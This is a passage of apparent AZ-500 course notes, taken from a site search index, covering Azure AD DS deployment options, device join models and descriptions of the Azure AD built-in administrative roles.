                              • Standalone cloud-only AD DS: Azure VMs are configured as domain controllers, and a separate, cloud-only AD DS environment is created. This AD DS environment doesn't integrate with an on-premises AD DS environment. A different set of credentials is used to sign in and administer VMs in the cloud.
                              • Resource forest deployment\u00a0- Azure VMs are configured as domain controllers, and an AD DS domain that's part of an existing forest is created. A trust relationship is then configured to an on-premises AD DS environment. Other Azure VMs can domain-join this resource forest in the cloud. User authentication runs over a VPN / ExpressRoute connection to the on-premises AD DS environment.
                              • Extend on-premises domain to Azure\u00a0- An Azure virtual network connects to an on-premises network using a VPN / ExpressRoute connection. Azure VMs connect to this Azure virtual network, which lets them domain-join to the on-premises AD DS environment. An alternative is to create Azure VMs and promote them as replica domain controllers from the on-premises AD DS domain. These domain controllers replicate over a VPN / ExpressRoute connection to the on-premises AD DS environment. The on-premises AD DS domain is effectively extended into Azure.

                            The following table outlines some of the features you may need for your organization and the differences between a managed Azure AD DS domain or a self-managed AD DS domain:

                            Feature Azure Active Directory Services (Azure AD DS) Self-managed AD DS Managed service \u2713 \u2715 Secure deployments \u2713 The administrator secures the deployment Domain Name System (DNS) server \u2713 (managed service) \u2713 Domain or Enterprise administrator privileges \u2715 \u2713 Domain join \u2713 \u2713 Domain authentication using New Technology LAN Manager (NTLM) and Kerberos \u2713 \u2713 Kerberos constrained delegation Resource-based Resource-based & account-based Custom organizational unit (OU) structure \u2713 \u2713 Group Policy \u2713 \u2713 Schema extensions \u2715 \u2713 Active Directory domain/forest trusts \u2713 (one-way outbound forest trusts only) \u2713 Secure Lightweight Directory Access Protocols (LDAPs) \u2713 \u2713 Lightweight Directory Access Protocol (LDAP) read \u2713 \u2713 Lightweight Directory Access Protocol (LDAP) write \u2713 (within the managed domain) \u2713 Geographical-distributed (Geo-distributed) deployments \u2713 \u2713

                            Azure Active Directory Domain Services (Azure AD DS) provides managed domain services such as domain join, group policy, lightweight directory access protocol (LDAP), and Kerberos/New Technology LAN Manager (NTLM) authentication. You use these domain services without the need to deploy, manage, and patch domain controllers (DCs) in the cloud.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#13-signing-devices-to-azure-active-directory","title":"1.3. Signing devices to Azure Active Directory","text":"

                            Azure AD lets you manage the identity of devices used by the organization and control access to corporate resources from those devices. Users can also register their personal device (a bring-your-own (BYO) model) with Azure AD, which provides the device with an identity. Azure AD then authenticates the device when a user signs in to Azure AD and uses the device to access secured resources. The device can be managed using Mobile Device Management (MDM) software like Microsoft Intune. This management ability lets you restrict access to sensitive resources to managed and policy-compliant devices.

                            Azure AD joined devices give you the following benefits:

                            • Single sign-on (SSO) to applications secured by Azure AD.
                            • Enterprise policy-compliant roaming of user settings across devices.
                            • Access to the Windows Store for Business using corporate credentials.
                            • Windows Hello for Business.
                            • Restricted access to apps and resources from devices compliant with corporate policy.

                            The following table outlines common device ownership models and how they would typically be joined to a domain:

                            Type of device Device platforms Mechanism Personal devices Windows 10, iOS, Android, macOS Azure AD registered Organization-owned device not joined to on-premises AD DS Windows 10 Azure AD joined Organization-owned device joined to an on-premises AD DS Windows 10 Hybrid Azure AD joined

                            The following table outlines differences in how the devices are represented and can authenticate themselves against the directory:

                            Aspect Azure AD-joined Azure AD DS-joined Device controlled by Azure AD Azure AD Domain Services managed domain Representation in the directory Device objects in the Azure AD directory Computer objects in the Azure AD DS managed domain Authentication Open Authorization OAuth / OpenID Connect-based protocols. These protocols are designed to work over the internet, so are great for mobile scenarios where users access corporate resources from anywhere. Kerberos and NTLM protocols, so it can support legacy applications migrated to run on Azure VMs as part of a lift-and-shift strategy Management Mobile Device Management (MDM) software like Intune Group Policy Networking Works over the internet Must be connected to, or peered with, the virtual network where the managed domain is deployed Great for... End-user mobile or desktop devices Server VMs deployed in Azure

                            If on-premises AD DS and Azure AD are configured for federated authentication using Active Directory Federation Services (ADFS), then there's no (current/valid) password hash available in Azure AD DS. Azure AD user accounts created before federated authentication was implemented might have an old password hash that doesn't match a hash of their on-premises password. Hence Azure AD DS won't validate the user's credentials.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#14-roles-in-azure-active-directory","title":"1.4. Roles in Azure Active Directory","text":"

                            Azure AD built-in roles differ in where they can be used, which fall into the following\u00a0three broad categories.

                            1. Azure AD-specific roles: These roles grant permissions to manage resources within Azure AD only. For example,\u00a0User Administrator,\u00a0Application Administrator, and\u00a0Groups Administrator\u00a0all grant permissions to manage resources that live in Azure AD.
                            2. Service-specific roles: For major Microsoft 365 services (non-Azure AD), we have built service-specific roles that grant permissions to manage all features within the service.
                            3. Cross-service roles: There are some roles that span services. We have two global roles - Global Administrator and Global Reader. All Microsoft 365 services honor these two roles. Also, there are some security-related roles like Security Administrator and Security Reader that grant access across multiple security services within Microsoft 365.\u00a0For example, using Security Administrator roles in Azure AD, you can manage Microsoft 365 Defender portal, Microsoft Defender Advanced Threat Protection, and Microsoft Defender for Cloud Apps.

                            The following table is offered as an aid to understanding these role categories. The categories are named arbitrarily and aren't intended to imply any other capabilities beyond the documented Azure AD role permissions.

                            Category Role Azure AD-specific roles Application Administrator Application Developer Authentication Administrator Business to consumer (B2C) Identity Experience Framework (IEF) Keyset Administrator Business to consumer (B2C) Identity Experience Framework (IEF) Policy Administrator Cloud Application Administrator Cloud Device Administrator Conditional Access Administrator Device Administrators Directory Readers Directory Synchronization Accounts Directory Writers External ID User Flow Administrator External ID User Flow Attribute Administrator External Identity Provider Administrator Groups Administrator Guest Inviter Helpdesk Administrator Hybrid Identity Administrator License Administrator Partner Tier1 Support Partner Tier2 Support Password Administrator Privileged Authentication Administrator Privileged Role Administrator Reports Reader User Administrator Cross-service roles Global Administrator Compliance Administrator Compliance Data Administrator Global Reader Security Administrator Security Operator Security Reader Service Support Administrator Service-specific roles Azure DevOps Administrator Azure Information Protection Administrator Billing Administrator Customer relationship management (CRM) Service Administrator Customer Lockbox Access Approver Desktop Analytics Administrator Exchange Service Administrator Insights Administrator Insights Business Leader Intune Service Administrator Kaizala Administrator Lync Service Administrator Message Center Privacy Reader Message Center Reader Modern Commerce User Network Administrator Office Apps Administrator Power BI Service Administrator Power Platform Administrator Printer Administrator Printer Technician Search Administrator Search Editor SharePoint Service Administrator Teams Communications Administrator Teams Communications Support Engineer Teams Communications Support Specialist Teams Devices Administrator Teams Administrator

                            These are all of the Azure AD built-in roles:

                            Role Description Application Administrator Users in this role can create and manage all aspects of enterprise applications, application registrations, and application proxy settings. Users assigned to this role aren't added as owners when creating new application registrations or enterprise applications. This role also grants the ability to consent for delegated permissions and application permissions, except for application permissions for Microsoft Graph. Application Developer Can create application registrations when the\u00a0Users can register applications\u00a0setting is set to No. Attack Payload Author Users in this role can create attack payloads but not actually launch or schedule them. Attack payloads are then available to all administrators in the tenant, who can use them to create a simulation. Attack Simulation Administrator Users in this role can create and manage all aspects of attack simulation creation, launch/scheduling of a simulation, and the review of simulation results. Members of this role have this access for all simulations in the tenant. Attribute Assignment Administrator Users with this role can assign and remove custom security attribute keys and values for supported Azure AD objects such as users, service principals, and devices. By default, Global Administrator and other administrator roles don't have permissions to read, define, or assign custom security attributes. To work with custom security attributes, you must be assigned one of the custom security attribute roles. Attribute Assignment Reader Users with this role can read custom security attribute keys and values for supported Azure AD objects. By default, Global Administrator and other administrator roles don't have permissions to read, define, or assign custom security attributes. You must be assigned one of the custom security attribute roles to work with custom security attributes. Attribute Definition Administrator Users with this role can define a valid set of custom security attributes that can be assigned to supported Azure AD objects. This role can also activate and deactivate custom security attributes. By default, Global Administrator and other administrator roles don't have permissions to read, define, or assign custom security attributes. To work with custom security attributes, you must be assigned one of the custom security attribute roles. Authentication Administrator Assign the Authentication Administrator role to users who need to do the following: -Set or reset any authentication method (including passwords) for nonadministrators and some roles. -Require users who are nonadministrators or assigned to some roles to re-register against existing nonpassword credentials (for example,\u00a0Multifactor authentication (MFA)\u00a0or\u00a0Fast ID Online (FIDO), and can also revoke remember MFA on the device, which prompts for MFA on the next sign-in. -Perform sensitive actions for some users. -Create and manage support tickets in Azure and the Microsoft 365 admin center. Users with this role can't do the following tasks: -Can't change the credentials or reset MFA for members and owners of a role-assignable group. -Can't manage MFA settings in the legacy MFA management portal or Hardware OATH tokens. The same functions can be accomplished using the Set-MsolUser commandlet Azure AD PowerShell module. 
Authentication Policy Administrator: Assign the Authentication Policy Administrator role to users who need to do the following:

• Configure the authentication methods policy, tenant-wide MFA settings, and the password protection policy that determine which methods each user can register and use.
• Manage Password Protection settings: smart lockout configurations and updating the custom banned passwords list.
• Create and manage verifiable credentials.
• Create and manage Azure support tickets.

Users with this role can't do the following tasks:

• Can't update sensitive properties.
• Can't delete or restore users.
• Can't manage MFA settings in the legacy MFA management portal or Hardware OATH tokens.

Azure AD Joined Device Local Administrator: This role is available for assignment only as an additional local administrator in Device settings. Users with this role become local machine administrators on all Windows 10 devices that are joined to Azure Active Directory. They don't have the ability to manage device objects in Azure Active Directory.

Azure DevOps Administrator: Users with this role can manage all enterprise Azure DevOps policies applicable to all Azure DevOps organizations backed by the Azure AD. Users in this role can manage these policies by navigating to any Azure DevOps organization that is backed by the company's Azure AD. Users in this role can claim ownership of orphaned Azure DevOps organizations. This role grants no other Azure DevOps-specific permissions (for example, Project Collection Administrators) inside any of the Azure DevOps organizations backed by the company's Azure AD organization.

Azure Information Protection Administrator: Users with this role have all permissions in the Azure Information Protection service. This role allows configuring labels for the Azure Information Protection policy, managing protection templates, and activating protection. This role doesn't grant any permissions in Identity Protection Center, Privileged Identity Management, Monitor Microsoft 365 Service Health, or Office 365 Security and compliance center.

Business-to-Consumer (B2C) Identity Experience Framework (IEF) Keyset Administrator: Users can create and manage policy keys and secrets for token encryption, token signatures, and claim encryption/decryption. By adding new keys to existing key containers, this limited administrator can roll over secrets as needed without impacting existing applications. This user can see the full content of these secrets and their expiration dates even after their creation.

Business-to-Consumer (B2C) Identity Experience Framework (IEF) Policy Administrator: Users in this role have the ability to create, read, update, and delete all custom policies in Azure AD B2C and therefore have full control over the Identity Experience Framework in the relevant Azure AD B2C organization. By editing policies, this user can establish direct federation with external identity providers, change the directory schema, change all user-facing content (HTML, CSS, and JavaScript), change the requirements to complete authentication, create new users, send user data to external systems including full migrations, and edit all user information including sensitive fields like passwords and phone numbers. Conversely, this role can't change the encryption keys or edit the secrets used for federation in the organization.

Billing Administrator: Makes purchases, manages subscriptions, manages support tickets, and monitors service health.

Cloud App Security Administrator: Users with this role have full permissions in Defender for Cloud Apps. They can add administrators, add Microsoft Defender for Cloud Apps policies and settings, upload logs, and perform governance actions.

Cloud Application Administrator: Users in this role have the same permissions as the Application Administrator role, excluding the ability to manage application proxy. This role grants the ability to create and manage all aspects of enterprise applications and application registrations. Users assigned to this role aren't added as owners when creating new application registrations or enterprise applications. This role also grants the ability to consent for delegated permissions and application permissions, except for application permissions for Microsoft Graph.

Cloud Device Administrator: Users in this role can enable, disable, and delete devices in Azure AD and read Windows 10 BitLocker keys (if present) in the Azure portal. The role doesn't grant permissions to manage any other properties on the device.

Compliance Administrator: Users with this role have permissions to manage compliance-related features in the Microsoft Purview compliance portal, Microsoft 365 admin center, Azure, and Office 365 Security and compliance center. Assignees can also manage all features within the Exchange admin center and create support tickets for Azure and Microsoft 365.

Compliance Data Administrator: Users with this role have permissions to track data in the Microsoft Purview compliance portal, Microsoft 365 admin center, and Azure. Users can also track compliance data within the Exchange admin center, Compliance Manager, and Teams and Skype for Business admin center and create support tickets for Azure and Microsoft 365.

Conditional Access Administrator: Users with this role have the ability to manage Azure Active Directory Conditional Access settings.

Customer Lockbox Access Approver: Manages Microsoft Purview Customer Lockbox requests in your organization. They receive email notifications for Customer Lockbox requests and can approve and deny requests from the Microsoft 365 admin center. They can also turn the Customer Lockbox feature on or off. Only Global Administrators can reset the passwords of people assigned to this role.

Desktop Analytics Administrator: Users in this role can manage the Desktop Analytics service, including viewing asset inventory, creating deployment plans, and viewing deployment and health status.

Directory Readers: Users in this role can read basic directory information. This role should be used for:

• Granting a specific set of guest users read access instead of granting it to all guest users.
• Granting a specific set of nonadmin users access to the Azure portal when "Restrict access to Azure AD portal to admins only" is set to "Yes".
• Granting service principals access to the directory where Directory.Read.All isn't an option.

Directory Synchronization Accounts: Don't use. This role is automatically assigned to the Azure AD Connect service and isn't intended or supported for any other use.

Directory Writers: Users in this role can read and update basic information of users, groups, and service principals.

Domain Name Administrator: Users with this role can manage (read, add, verify, update, and delete) domain names. They can also read directory information about users, groups, and applications, as these objects possess domain dependencies. For on-premises environments, users with this role can configure domain names for federation so that associated users are always authenticated on-premises. These users can then sign in to Azure AD-based services with their on-premises passwords via single sign-on. Federation settings need to be synced via Azure AD Connect, so users also have permissions to manage Azure AD Connect.

Dynamics 365 Administrator: Users with this role have global permissions within Microsoft Dynamics 365 Online, when the service is present, and the ability to manage support tickets and monitor service health.

Edge Administrator: Users in this role can create and manage the enterprise site list required for Internet Explorer mode on Microsoft Edge. This role grants permissions to create, edit, and publish the site list and additionally allows access to manage support tickets.

Exchange Administrator: Users with this role have global permissions within Microsoft Exchange Online, when the service is present. Also has the ability to create and manage all Microsoft 365 groups, manage support tickets, and monitor service health.

Exchange Recipient Administrator: Users with this role have read access to recipients and write access to the attributes of those recipients in Exchange Online.

External ID User Flow Administrator: Users with this role can create and manage user flows (also called "built-in" policies) in the Azure portal. These users can customize HTML/CSS/JavaScript content, change MFA requirements, select claims in the token, manage API connectors and their credentials, and configure session settings for all user flows in the Azure AD organization. On the other hand, this role doesn't include the ability to review user data or make changes to the attributes that are included in the organization schema. Changes to Identity Experience Framework policies (also known as custom policies) are also outside the scope of this role.

External ID User Flow Attribute Administrator: Users with this role add or delete custom attributes available to all user flows in the Azure AD organization. Users with this role can change or add new elements to the end-user schema and impact the behavior of all user flows, and indirectly result in changes to what data may be asked of end users and ultimately sent as claims to applications. This role can't edit user flows.

External Identity Provider Administrator: This administrator manages federation between Azure AD organizations and external identity providers. With this role, users can add new identity providers and configure all available settings (for example, authentication path, service ID, assigned key containers). This user can enable the Azure AD organization to trust authentications from external identity providers. The resulting impact on end-user experiences depends on the type of organization:

• Azure AD organizations for employees and partners: The addition of a federation (for example, with Gmail) immediately impacts all guest invitations not yet redeemed. See Adding Google as an identity provider for B2B guest users.
• Azure Active Directory B2C organizations: The addition of a federation (for example, with Facebook, or with another Azure AD organization) doesn't immediately impact end-user flows until the identity provider is added as an option in a user flow (also called a built-in policy).

Global Administrator: Users with this role have access to all administrative features in Azure Active Directory, and services that use Azure Active Directory identities like the Microsoft 365 Defender portal, the Microsoft Purview compliance portal, Exchange Online, SharePoint Online, and Skype for Business Online. Furthermore, Global Administrators can elevate their access to manage all Azure subscriptions and management groups. This allows Global Administrators to get full access to all Azure resources using the respective Azure AD tenant. The person who signs up for the Azure AD organization becomes a Global Administrator. There can be more than one Global Administrator at your company. Global Administrators can reset the password for any user and all other administrators. As a best practice, Microsoft recommends that you assign the Global Administrator role to fewer than five people in your organization.

Global Reader: Users in this role can read settings and administrative information across Microsoft 365 services but can't take management actions. Global Reader is the read-only counterpart to Global Administrator. Assign Global Reader instead of Global Administrator for planning, audits, or investigations. Use Global Reader in combination with other limited admin roles like Exchange Administrator to make it easier to get work done without assigning the Global Administrator role. Global Reader works with the Microsoft 365 admin center, Exchange admin center, SharePoint admin center, Teams admin center, Security center, compliance center, Azure AD admin center, and Device Management admin center. Users with this role can't do the following tasks:

• Can't access the Purchase Services area in the Microsoft 365 admin center.

Groups Administrator: Users in this role can create and manage groups and their settings, like naming and expiration policies. It's important to understand that assigning a user to this role gives them the ability to manage all groups in the organization across various workloads like Teams, SharePoint, and Yammer, in addition to Outlook. The user is also able to manage the various group settings across various admin portals like the Microsoft admin center, the Azure portal, and workload-specific ones like the Teams and SharePoint admin centers.

Guest Inviter: Users in this role can manage Azure Active Directory B2B guest user invitations when the "Members can invite" user setting is set to No.

Helpdesk Administrator: Users with this role can change passwords, invalidate refresh tokens, create and manage support requests with Microsoft for Azure and Microsoft 365 services, and monitor service health. Invalidating a refresh token forces the user to sign in again. Whether a Helpdesk Administrator can reset a user's password and invalidate refresh tokens depends on the role the user is assigned. Users with this role can't do the following:

• Can't change the credentials or reset MFA for members and owners of a role-assignable group.

Hybrid Identity Administrator: Users in this role can create, manage, and deploy provisioning configuration setup from AD to Azure AD using Cloud Provisioning, and manage Azure AD Connect, Pass-through Authentication (PTA), Password hash synchronization (PHS), Seamless single sign-on (Seamless SSO), and federation settings. Users can also troubleshoot and monitor logs using this role.

Identity Governance Administrator: Users with this role can manage Azure AD identity governance configuration, including access packages, access reviews, catalogs, and policies, ensuring access is approved and reviewed and guest users who no longer need access are removed.

Insights Administrator: Users in this role can access the full set of administrative capabilities in the Microsoft Viva Insights app. This role has the ability to read directory information, monitor service health, file support tickets, and access the Insights Administrator settings aspects.

Insights Analyst: Assign the Insights Analyst role to users who need to do the following tasks:

• Analyze data in the Microsoft Viva Insights app, but can't manage any configuration settings
• Create, manage, and run queries
• View basic settings and reports in the Microsoft 365 admin center
• Create and manage service requests in the Microsoft 365 admin center

Insights Business Leader: Users in this role can access a set of dashboards and insights via the Microsoft Viva Insights app. This includes full access to all dashboards and presented insights and data exploration functionality. Users in this role don't have access to product configuration settings, which is the responsibility of the Insights Administrator role.

Intune Administrator: Users with this role have global permissions within Microsoft Intune Online, when the service is present. Additionally, this role contains the ability to manage users and devices to associate policy, and to create and manage groups. This role can create and manage all security groups. However, the Intune Administrator doesn't have admin rights over Office groups. That means the admin can't update owners or memberships of all Office groups in the organization. However, you can manage the Office group that's created, which comes as a part of end-user privileges. So, any Office group (not security group) that you create should be counted against your quota of 250.

Kaizala Administrator: Users with this role have global permissions to manage settings within Microsoft Kaizala, when the service is present, and the ability to manage support tickets and monitor service health. Additionally, the user can access reports related to adoption and usage of Kaizala by organization members and business reports generated using Kaizala actions.

Knowledge Administrator: Users in this role have full access to all knowledge, learning, and intelligent features settings in the Microsoft 365 admin center. They have a general understanding of the suite of products and licensing details, and have responsibility to control access. Knowledge Administrators can create and manage content, like topics, acronyms, and learning resources. Additionally, these users can create content centers, monitor service health, and create service requests.

Knowledge Manager: Users in this role can create and manage content, like topics, acronyms, and learning content. These users are primarily responsible for the quality and structure of knowledge. This user has full rights to topic management actions to confirm a topic, approve edits, or delete a topic. This role can also manage taxonomies as part of the term store management tool and create content centers.

License Administrator: Users in this role can add, remove, and update license assignments on users and groups (using group-based licensing), and manage the usage location on users. The role doesn't grant the ability to purchase or manage subscriptions, create or manage groups, or create or manage users beyond the usage location. This role has no access to view, create, or manage support tickets.

Lifecycle Workflows Administrator: Assign the Lifecycle Workflows Administrator role to users who need to do the following tasks:

• Create and manage all aspects of workflows and tasks associated with Lifecycle Workflows in Azure AD
• Check the execution of scheduled workflows
• Launch on-demand workflow runs
• Inspect workflow execution logs

Message Center Privacy Reader: Users in this role can monitor all notifications in the Message Center, including data privacy messages. Message Center Privacy Readers get email notifications, including those related to data privacy, and they can unsubscribe using Message Center Preferences. Only the Global Administrator and the Message Center Privacy Reader can read data privacy messages. Additionally, this role contains the ability to view groups, domains, and subscriptions. This role has no permission to view, create, or manage service requests.

Message Center Reader: Users in this role can monitor notifications and advisory health updates in the Message center for their organization on configured services such as Exchange, Intune, and Microsoft Teams. Message Center Readers receive weekly email digests of posts and updates, and can share message center posts in Microsoft 365. In Azure AD, users assigned to this role will only have read-only access on Azure AD services such as users and groups. This role has no access to view, create, or manage support tickets.

Microsoft Hardware Warranty Administrator: Assign the Microsoft Hardware Warranty Administrator role to users who need to do the following tasks:

• Create new warranty claims for Microsoft manufactured hardware, like Surface and HoloLens
• Search and read opened or closed warranty claims
• Search and read warranty claims by serial number
• Create, read, update, and delete shipping addresses
• Read shipping status for open warranty claims
• Create and manage service requests in the Microsoft 365 admin center
• Read Message center announcements in the Microsoft 365 admin center

Microsoft Hardware Warranty Specialist: Assign the Microsoft Hardware Warranty Specialist role to users who need to do the following tasks:

• Create new warranty claims for Microsoft manufactured hardware, like Surface and HoloLens
• Read warranty claims that they created
• Read and update existing shipping addresses
• Read shipping status for open warranty claims they created
• Create and manage service requests in the Microsoft 365 admin center

Modern Commerce User: Don't use. This role is automatically assigned from Commerce, and isn't intended or supported for any other use. The Modern Commerce User role gives certain users permission to access the Microsoft 365 admin center and see the left navigation entries for Home, Billing, and Support. The content available in these areas is controlled by commerce-specific roles assigned to users to manage products that they bought for themselves or your organization. This might include tasks like paying bills, or access to billing accounts and billing profiles. Users with the Modern Commerce User role typically have administrative permissions in other Microsoft purchasing systems, but don't have the Global Administrator or Billing Administrator roles used to access the admin center.

Network Administrator: Users in this role can review network perimeter architecture recommendations from Microsoft that are based on network telemetry from their user locations. Network performance for Microsoft 365 relies on careful enterprise customer network perimeter architecture, which is generally user-location specific. This role allows for editing of discovered user locations and configuration of network parameters for those locations to facilitate improved telemetry measurements and design recommendations.

Office Apps Administrator: Users in this role can manage Microsoft 365 apps' cloud settings. This includes managing cloud policies, self-service download management, and the ability to view Office apps related reports. This role additionally grants the ability to manage support tickets and monitor service health within the main admin center. Users assigned to this role can also manage communication of new features in Office apps.

Organizational Messages Writer: Assign the Organizational Messages Writer role to users who need to do the following tasks:

• Write, publish, and delete organizational messages using Microsoft 365 admin center or Microsoft Endpoint Manager
• Manage organizational message delivery options using Microsoft 365 admin center or Microsoft Endpoint Manager
• Read organizational message delivery results using Microsoft 365 admin center or Microsoft Endpoint Manager
• View usage reports and most settings in the Microsoft 365 admin center, but can't make changes

Partner Tier1 Support: Don't use. This role has been deprecated and will be removed from Azure AD in the future. This role is intended for use by a few Microsoft resale partners, and isn't intended for general use.

Partner Tier2 Support: Don't use. This role has been deprecated and will be removed from Azure AD in the future. This role is intended for use by a few Microsoft resale partners, and isn't intended for general use.

Password Administrator: Users with this role have limited ability to manage passwords. This role doesn't grant the ability to manage service requests or monitor service health. Whether a Password Administrator can reset a user's password depends on the role the user is assigned. Users with this role can't do the following tasks:

• Can't change the credentials or reset MFA for members and owners of a role-assignable group.

Permissions Management Administrator: Assign the Permissions Management Administrator role to users who need to do the following tasks:

• Manage all aspects of Entra Permissions Management, when the service is present

Power Business Intelligence (BI) Administrator: Users with this role have global permissions within Microsoft Power BI, when the service is present, and the ability to manage support tickets and monitor service health.

Power Platform Administrator: Users in this role can create and manage all aspects of environments, Power Apps, Flows, and Data Loss Prevention policies. Additionally, users with this role have the ability to manage support tickets and monitor service health.

Printer Administrator: Users in this role can register printers and manage all aspects of all printer configurations in the Microsoft Universal Print solution, including the Universal Print Connector settings. They can consent to all delegated print permission requests. Printer Administrators also have access to print reports.

Printer Technician: Users with this role can register printers and manage printer status in the Microsoft Universal Print solution. They can also read all connector information. The key tasks a Printer Technician can't do are setting user permissions on printers and sharing printers.

Privileged Authentication Administrator: Assign the Privileged Authentication Administrator role to users who need to do the following tasks:

• Set or reset any authentication method (including passwords) for any user, including Global Administrators.
• Delete or restore any users, including Global Administrators. For more information, see Who can perform sensitive actions.
• Force users to re-register against existing nonpassword credentials (such as MFA or FIDO) and revoke remember MFA on the device, prompting for MFA on the next sign-in of all users.
• Update sensitive properties for all users. For more information, see Who can perform sensitive actions.
• Create and manage support tickets in Azure and the Microsoft 365 admin center.

Users with this role can't do the following tasks:

• Can't manage per-user MFA in the legacy MFA management portal. The same functions can be accomplished using the Set-MsolUser cmdlet in the Azure AD PowerShell module.

Privileged Role Administrator: Users with this role can manage role assignments in Azure Active Directory and within Azure AD Privileged Identity Management. They can create and manage groups that can be assigned to Azure AD roles. In addition, this role allows management of all aspects of Privileged Identity Management and administrative units. This role grants the ability to manage assignments for all Azure AD roles, including the Global Administrator role. It doesn't include any other privileged abilities in Azure AD, like creating or updating users. However, users assigned to this role can grant themselves or others additional privileges by assigning extra roles.

Reports Reader: Users with this role can view usage reporting data and the reports dashboard in the Microsoft 365 admin center and the adoption context pack in Power Business Intelligence (Power BI). Additionally, the role provides access to all sign-in logs, audit logs, and activity reports in Azure AD and data returned by the Microsoft Graph reporting API. A user assigned to the Reports Reader role can access only relevant usage and adoption metrics. They don't have any admin permissions to configure settings or access the product-specific admin centers like Exchange. This role has no access to view, create, or manage support tickets.

Search Administrator: Users in this role have full access to all Microsoft Search management features in the Microsoft 365 admin center. Additionally, these users can view the message center, monitor service health, and create service requests.

Search Editor: Users in this role can create, manage, and delete content for Microsoft Search in the Microsoft 365 admin center, including bookmarks, questions and answers, and locations.

Security Administrator: Users with this role have permissions to manage security-related features in the Microsoft 365 Defender portal, Azure Active Directory Identity Protection, Azure Active Directory Authentication, Azure Information Protection, and the Office 365 Security and compliance center.

Security Operator: Users with this role can manage alerts and have global read-only access on security-related features, including all information in the Microsoft 365 security center, Azure Active Directory, Identity Protection, Privileged Identity Management, and the Office 365 Security & compliance center.

Security Reader: Users with this role have global read-only access on security-related features, including all information in the Microsoft 365 security center, Azure Active Directory, Identity Protection, and Privileged Identity Management, as well as the ability to read Azure Active Directory sign-in reports and audit logs, and in the Office 365 Security and compliance center.

Service Support Administrator: Users with this role can create and manage support requests with Microsoft for Azure and Microsoft 365 services, and view the service dashboard and message center in the Azure portal and Microsoft 365 admin center.

SharePoint Administrator: Users with this role have global permissions within Microsoft SharePoint Online, when the service is present, and the ability to create and manage all Microsoft 365 groups, manage support tickets, and monitor service health.

Skype for Business Administrator: Users with this role have global permissions within Microsoft Skype for Business, when the service is present, and manage Skype-specific user attributes in Azure Active Directory. Additionally, this role grants the ability to manage support tickets and monitor service health, and to access the Teams and Skype for Business admin center. The account must also be licensed for Teams or it can't run Teams PowerShell cmdlets.

Teams Administrator: Users in this role can manage all aspects of the Microsoft Teams workload via the Microsoft Teams and Skype for Business admin center and the respective PowerShell modules. This includes, among other areas, all management tools related to telephony, messaging, meetings, and the teams themselves. This role additionally grants the ability to create and manage all Microsoft 365 groups, manage support tickets, and monitor service health.

Teams Communications Administrator: Users in this role can manage aspects of the Microsoft Teams workload related to voice and telephony. This includes the management tools for telephone number assignment, voice and meeting policies, and full access to the call analytics toolset.

Teams Communications Support Engineer: Users in this role can troubleshoot communication issues within Microsoft Teams and Skype for Business using the user call troubleshooting tools in the Microsoft Teams and Skype for Business admin center. Users in this role can view full call record information for all participants involved. This role has no access to view, create, or manage support tickets.

Teams Communications Support Specialist: Users in this role can troubleshoot communication issues within Microsoft Teams and Skype for Business using the user call troubleshooting tools in the Microsoft Teams and Skype for Business admin center. Users in this role can only view user details in the call for the specific user they've looked up. This role has no access to view, create, or manage support tickets.

Teams Devices Administrator: Users with this role can manage Teams-certified devices from the Teams admin center. This role allows viewing all devices at a single glance, with the ability to search and filter devices. The user can check the details of each device, including the logged-in account and the make and model of the device. The user can change the settings on the device and update the software versions. This role doesn't grant permissions to check Teams activity and call quality of the device.

Tenant Creator: Assign the Tenant Creator role to users who need to do the following tasks:

• Create both Azure Active Directory and Azure Active Directory B2C tenants, even if the tenant creation toggle is turned off in the user settings

Usage Summary Reports Reader: Users with this role can access tenant-level aggregated data and associated insights in the Microsoft 365 admin center for Usage and Productivity Score, but can't access any user-level details or insights. In the Microsoft 365 admin center for the two reports, we differentiate between tenant-level aggregated data and user-level details. This role gives an extra layer of protection on individual user identifiable data, which was requested by both customers and legal teams.

User Administrator: Assign the User Administrator role to users who need to do the following tasks:

• Create users
• Update most user properties for all users, including all administrators
• Update sensitive properties (including user principal name) for some users
• Disable or enable some users
• Delete or restore some users
• Create and manage user views
• Create and manage all groups
• Assign licenses for all users, including all administrators
• Reset passwords
• Invalidate refresh tokens
• Update (FIDO) device keys
• Update password expiration policies
• Create and manage support tickets in Azure and the Microsoft 365 admin center
• Monitor service health

Users with this role can't do the following tasks:

• Can't manage MFA.
• Can't change the credentials or reset MFA for members and owners of a role-assignable group.
• Can't manage shared mailboxes.

Note that users with this role can change passwords for people who may have access to sensitive or private information or critical configuration inside and outside of Azure Active Directory. Changing the password of a user may mean the ability to assume that user's identity and permissions. For example:

• Application Registration and Enterprise Application owners, who can manage credentials of apps they own. Those apps may have privileged permissions in Azure AD and elsewhere not granted to User Administrators. Through this path, a User Administrator may be able to assume the identity of an application owner and then further assume the identity of a privileged application by updating the credentials for the application.
• Azure subscription owners, who may have access to sensitive or private information or critical configuration in Azure.
• Security Group and Microsoft 365 group owners, who can manage group membership. Those groups may grant access to sensitive or private information or critical configuration in Azure AD and elsewhere.
• Administrators in other services outside of Azure AD, like Exchange Online, Office Security and compliance center, and human resources systems.
• Nonadministrators, like executives, legal counsel, and human resources employees, who may have access to sensitive or private information.

Virtual Visits Administrator: Users with this role can do the following tasks:

• Manage and configure all aspects of Virtual Visits in Bookings in the Microsoft 365 admin center, and in the Teams Electronic Health Record (EHR) connector
• View usage reports for Virtual Visits in the Teams admin center, Microsoft 365 admin center, and Power BI
• View features and settings in the Microsoft 365 admin center, but can't edit any settings

Windows 365 Administrator: Users with this role have global permissions on Windows 365 resources, when the service is present. Additionally, this role contains the ability to manage users and devices in order to associate policy, and to create and manage groups. This role can create and manage security groups, but doesn't have administrator rights over Microsoft 365 groups. That means administrators can't update owners or memberships of Microsoft 365 groups in the organization. However, they can manage the Microsoft 365 group they create, which is a part of their end-user privileges. So, any Microsoft 365 group (not security group) they create is counted against their quota of 250. Assign the Windows 365 Administrator role to users who need to do the following tasks:

• Manage Windows 365 Cloud PCs in Microsoft Endpoint Manager
• Enroll and manage devices in Azure AD, including assigning users and policies
• Create and manage security groups, but not role-assignable groups
• View basic properties in the Microsoft 365 admin center
• Read usage reports in the Microsoft 365 admin center
• Create and manage support tickets in Azure and the Microsoft 365 admin center

